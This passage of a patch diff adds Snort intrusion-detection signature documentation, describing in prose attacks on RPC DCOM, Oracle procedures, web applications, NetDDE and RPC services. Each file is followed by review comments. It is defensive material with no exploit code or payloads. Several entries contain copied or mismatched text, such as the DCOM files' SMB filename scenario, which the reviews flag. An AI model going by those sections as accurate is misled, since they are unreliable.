+SMB data, exploit code may be included and executed on the machine with 
+system level privileges. Alternatively, the malformed data may cause the service to become 
+unresponsive and cause a DoS condition.
+
+Sensors under attack will display "PAM_internal_error" as a message on
+the console.
+
+Sucessful exploitation of this issue could present an attacker with the 
+opportunity to execute code of their choosing on the target host with system
+privileges. It is also possible for a Denial of Service (DoS) condition to 
+be caused by an attacker attempting to exploit this condition.
+
+--
+Affected Systems:
+	RealSecure Network 7.0, XPU 20.15 through 22.9
+	Real Secure Server Sensor 7.0 XPU 20.16 through 22.9
+	Proventia A Series XPU 20.15 through 22.9
+	Proventia G Series XPU 22.3 through 22.9
+	Proventia M Series XPU 1.3 through 1.7
+	RealSecure Desktop 7.0 eba through ebh
+	RealSecure Desktop 3.6 ebr through ecb
+	RealSecure Guard 3.6 ebr through ecb
+	RealSecure Sentry 3.6 ebr through ecb
+	BlackICE PC Protection 3.6 cbr through ccb
+	BlackICE Server Protection 3.6 cbr through ccb
+
+--
+Attack Scenarios:
+An attacker may use this vulnerability to disable ISS sensors on a
+network or potentially use it to gain control of a machine running one
+of the affected products.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+This rule may not generate an alert if a legitimate SMB request contains a password
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+eEye
+http://www.eeye.com/html/Research/Advisories/AD20040226.html
+
+Bugtraq
+http://www.securityfocus.com/bid/9752
+
+--
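Review bot: False Negatives ("This rule may not generate an alert if a legitimate SMB request contains a password") is an unfinished sentence with no period and does not explain why a password would suppress the alert; it should state the actual condition under which the rule misses an oversized AccountName. The second and fourth paragraphs of Detailed Information both describe the same code-execution/DoS outcome and could be merged, "Sucessful" should be "Successful", and the heading "References:" differs from "Additional References:" used elsewhere in the patch.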
--- /dev/null
+++ b/doc/signatures/100000348.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000348
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ezupload Pro" application running on a webserver. Access to the file "customize.php" using a remote file being passed as the "path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "path" parameter in the "customize.php" script used by the "Ezupload Pro" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ezupload Pro
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
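Review bot: the third Detailed Information paragraph ("Some applications do not perform stringent checks when validating the credentials of a client host") describes a credential-validation weakness, not the remote file include issue in the "path" parameter that the Summary and first paragraph describe; drop it or replace it with text about untrusted file paths. Minor points: "ona web server" should be "on a web server", "attackers choosing" needs an apostrophe, "an exploitation attempt has been attempted" is redundant, and Additional References is empty even though Ease of Attack states "Exploits exist."; a reference to the advisory the rule was written from would help.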
--- /dev/null
+++ b/doc/signatures/1604.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1604
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
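Review bot: Affected Systems is empty; for a generic directory traversal signature a line in the form used elsewhere in this patch ("All systems running ...") is better than nothing. Detailed Information says the attack targets "web, web applications and ftp servers" but Attack Scenarios only talks about "the ftp root directory"; align the two. The separator after Contributors is "-- " with a trailing space while the rest of the file uses "--"; trailing whitespace on separators can break simple section parsers.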
--- /dev/null
+++ b/doc/signatures/3264.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3264
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
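Review bot: the Attack Scenarios text ("a request for a file with an overly long filename via a network share") describes an SMB file request, not the malformed RPC DCOM request that the Summary and Detailed Information describe; it looks copied from a different signature and should be rewritten around a malformed DCOM request. "Expoit" in Ease of Attack is a typo for "Exploit". Additional References is empty for a vulnerability that has a vendor bulletin and CVE entry; add those links.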
--- /dev/null
+++ b/doc/signatures/122-25.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-25
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a icmp
+sweep was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
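Review bot: typos in this hunk: "a icmp sweep" should read "an ICMP sweep" (Summary), "reconnaisance" should be "reconnaissance" (Impact) and "consititute" should be "constitute" (Detailed Information). In Corrective Action, "Apply any appropriate vendor supplied patches as appropriate." repeats itself; one "appropriate" is enough. "None Known." in False Negatives uses a capital K unlike the other files.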
--- /dev/null
+++ b/doc/signatures/3278.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3278
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
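Review bot: the body of this file is identical to doc/signatures/3264.txt in the same patch, including the Attack Scenarios paragraph about an overly long filename on a network share that does not match the RPC DCOM vulnerability described, and the "Expoit" typo. If sids 3264 and 3278 match different variants of the traffic, the Summary or Detailed Information should say what distinguishes them; in either case fix the typo and rewrite Attack Scenarios around a malformed DCOM request here as well.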
--- /dev/null
+++ b/doc/signatures/1162.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1162
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
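Review bot: Affected Systems and Additional References are both empty, so the reader cannot tell which web server or application sid 1162 is written for; at minimum name the software or the advisory, or state that the rule is generic. "ona web server" in Detailed Information should be "on a web server".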
--- /dev/null
+++ b/doc/signatures/590.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+590
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) ypserv is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port ypserv is using.  Attackers can also learn what versions of the ypserv protocol are accepted by ypserv. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as ypserv run.  The ypserv RPC service looks up information in the local Network Information Service (NIS) maps.  The ypserv program provides the server function for Yellow Pages (YP) by providing clients information from NIS maps.  Multiple vulnerabilities are associated with the ypserv RPC program.
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where ypserv runs.  This may be a precursor to accessing ypserv.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access ypserv, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for ypserv, not probes of the ypserv service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the ypserv service itself. An attacker may attempt to go directly to the ypserv port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/6016
+http://www.securityfocus.com/bid/5914
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1232
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1042
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1043
+
+Arachnids:
+http://www.whitehats.com/info/IDS12
+
+
+--
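Review bot: Ease of Attack reads "Easy." while every other file in this patch uses "Simple."; keep the vocabulary consistent. There are two blank lines after the Summary paragraph and again before the closing separator where the other files have one. The False Negatives paragraph, explaining that the rule sees only portmapper GETPORT lookups and not direct connections to ypserv, is the kind of detail the other RPC entries in this patch (574.txt, 2032.txt) lack and would benefit from.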
--- /dev/null
+++ b/doc/signatures/2760.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2760
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure define_column_group
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
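Review bot: a line break in Detailed Information splits a sentence so that a line starts with a period: "vulnerability in the procedure define_column_group" followed by ". This procedure is included in"; join them so the procedure name and its period sit on one line. "Oracle Oracle9i" in Affected Systems repeats the vendor name. Several separators are "-- " with trailing whitespace while others are "--", and Additional References is empty for a known Oracle vulnerability; add the vendor alert or CVE link.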
--- /dev/null
+++ b/doc/signatures/100000448.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000448
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "OfficeFlow" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "sqlType" parameter in the "default.asp" script 
+used by the "OfficeFlow" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using OfficeFlow
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
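Review bot: the blank line before the "--" separator is missing after the Sid (the line "100000448" is followed directly by "--"), after Affected Systems and after Contributors, unlike the rest of this file and the other files in the patch. The Impact paragraph ("system integrity compromise", "administrative access to the server", "execution of arbitrary code") is the remote file include boilerplate; for a cross site scripting issue in the "sqlType" parameter the realistic impact is what Attack Scenarios already says, information stolen from a user who follows a crafted link, so Impact should be scaled back to that. "attackers choosing" needs an apostrophe in both places.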
--- /dev/null
+++ b/doc/signatures/2218.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2218
+
+--
+Summary:
+This event is generated when an attempt is made to access service.cgi on an internal web server. This may indicate an attempt to exploit a cross-site scripting vulnerability in Sun Microsystems' Cobalt RaQ server appliance.
+
+--
+Impact:
+System integrity, possible denial of service.
+
+--
+Detailed Information:
+The alert.cgi file on Sun Microsystems' Cobalt RaQ web server appliance does not properly parse HTML tags submitted in URLs. This can allow an attacker to use a specially crafted URL to execute JavaScript to place scripts or content on the web server. In addition, an overly long URL could be used to crash the server.
+
+--
+Affected Systems:
+Any Cobalt RaQ 2.0, 3.0, or 4.0 server appliance.
+
+--
+Attack Scenarios:
+An attacker crafts a URL with JavaScript and passes the content to service.cgi on a vulnerable RaQ server. The server then executes the JavaScript included in the URL, placing malicious content on the web server. An attacker could also send an overly long URL to service.cgi, which will crash the server.
+
+--
+Ease of Attack:
+Simple. Proof of concepts exist.
+
+--
+False Positives:
+If a legitimate remote user accesses alert.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Workarounds have been provided on the BugTraq mailing list. See http://marc.theaimsgroup.com/?l=bugtraq&m=101500887122597&w=2 for more information.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/4211
+
+--
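Review bot: the script names do not agree: the Summary and Attack Scenarios refer to "service.cgi" while Detailed Information and False Positives refer to "alert.cgi"; check the rule's content match and use the same name throughout. The mailing list URL given in Corrective Action is a reasonable workaround pointer, but it should also be listed under Additional References alongside the Bugtraq id.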
--- /dev/null
+++ b/doc/signatures/2788.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2788
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure make_column_group
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
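Review bot: the same layout defect as in 2760.txt: the sentence in Detailed Information is broken so that ". This procedure is included in" starts a line after "make_column_group"; join the two lines. "Oracle Oracle9i" repeats the vendor name in Affected Systems, several "-- " separators carry trailing whitespace, and Additional References is empty for a known Oracle vulnerability.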
--- /dev/null
+++ b/doc/signatures/100000175.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+100000175
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a buffer overflow 
+vulnerability present in the Ethereal protocol analyzer's SLIMP3 decoder. 
+
+-- 
+
+Impact: 
+By sending a properly crafted UDP packet, attackers may execute arbitrary code 
+of 
+their choosing with the privileges of the user running the affected software.
+
+--
+Detailed Information:
+This rule detects attempts to overflow a vulnerable buffer in the Ethereal
+protocol analyzer's SLIMP3 decoder. It is specifically designed to search for
+the payload present in a publicly circulating exploit.
+
+--
+Affected Systems:
+Ethereal 0.10.12 and below
+
+--
+
+Attack Scenarios: 
+An  automated script may be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as an exploit is publicly available.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+Other payloads which will overflow this buffer may be missed.
+
+-- 
+
+Corrective Action: 
+Upgrade to Ethereal 0.10.13 or higher.
+
+--
+Contributors: 
+rmkml <rmkml@free.fr>
+
+-- 
+Additional References:
+http://www.frsirt.com/english/advisories/2005/2148
+
+--
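Review bot: the Impact paragraph is mis-wrapped: "of " sits alone on a line between "attackers may execute arbitrary code" and "their choosing with the privileges"; rewrap it. Several "--" separators are followed by an extra blank line (before Impact, Attack Scenarios, Ease of Attack, False Positives and Corrective Action) while the others are not; pick one form. The False Negatives note that the rule matches only the payload of one public exploit is worth keeping, and the Summary could say the same so that readers do not assume generic coverage of the SLIMP3 overflow.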
--- /dev/null
+++ b/doc/signatures/1637.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1637
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
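Review bot: the Detailed Information text is generic CGI boilerplate that names no application, and Affected Systems ("All systems running CGI applications") and the empty Additional References give the reader nothing to identify which script sid 1637 watches; name the script or the advisory. "ona web server" should be "on a web server", and the line "relationships between the victim server and other hosts can be exploited by the attacker." runs well past the wrap width used in the rest of the file.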
--- /dev/null
+++ b/doc/signatures/2934.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2934
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
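Review bot: the Impact line "Execution of arbitrary code with system level privileges" and the Corrective Action line "Apply the appropriate vendor supplied patches" both lack a terminating period, unlike the rest of the file. The note that NetDDE is not started by default but can still be used for local privilege escalation is a useful qualifier on the "Serious" rating and should stay.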
--- /dev/null
+++ b/doc/signatures/574.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+574
+
+--
+Summary:
+This event is generated when a request is made to Network File System (NFS) to list all exported file systems and which clients are permitted to mount each file system. 
+
+--
+Impact:
+Information disclosure.  This can allow an attacker to discover exported NFS file systems and client mount permissions.
+
+--
+Detailed Information:
+The mountd Remote Procedure Call (RPC) implements the NFS mount protocol.  When an NFS client requests a mount of an NFS file system, mountd examines the list of exported file systems.  If the NFS client is permitted access to the requested file system, mountd returns a file handle for the requested directory.  An attacker or legitimate NFS client may request a list of exported file systems and client mount permissions.
+
+--
+Affected Systems:
+All systems running NFS.
+
+--
+Attack Scenarios:
+An attacker may attempt to list the exported NFS file systems as a precursor to mounting them to read or change a specific file. 
+
+--
+Ease of Attack:
+Simple.   
+
+--
+False Positives:
+If a legitimate remote user is allowed to list exported NFS file systems, this rule may trigger.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+http://www.whitehats.com/info/IDS26
+
+
+--
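Review bot: the Ease of Attack line "Simple.   " carries trailing spaces and False Negatives uses "None Known." with a capital K, unlike the other files; both are small, but trailing whitespace is what simple section parsers trip on. The whitehats.com link under Additional References lacks the "Arachnids:" label that 590.txt gives the same kind of link, and there are two blank lines before the closing separator.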
--- /dev/null
+++ b/doc/signatures/100000516.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000516
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "CMS Faethon" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "mainpath" parameter in the "footer.php" script 
+used by the "CMS Faethon" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using CMS Faethon
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
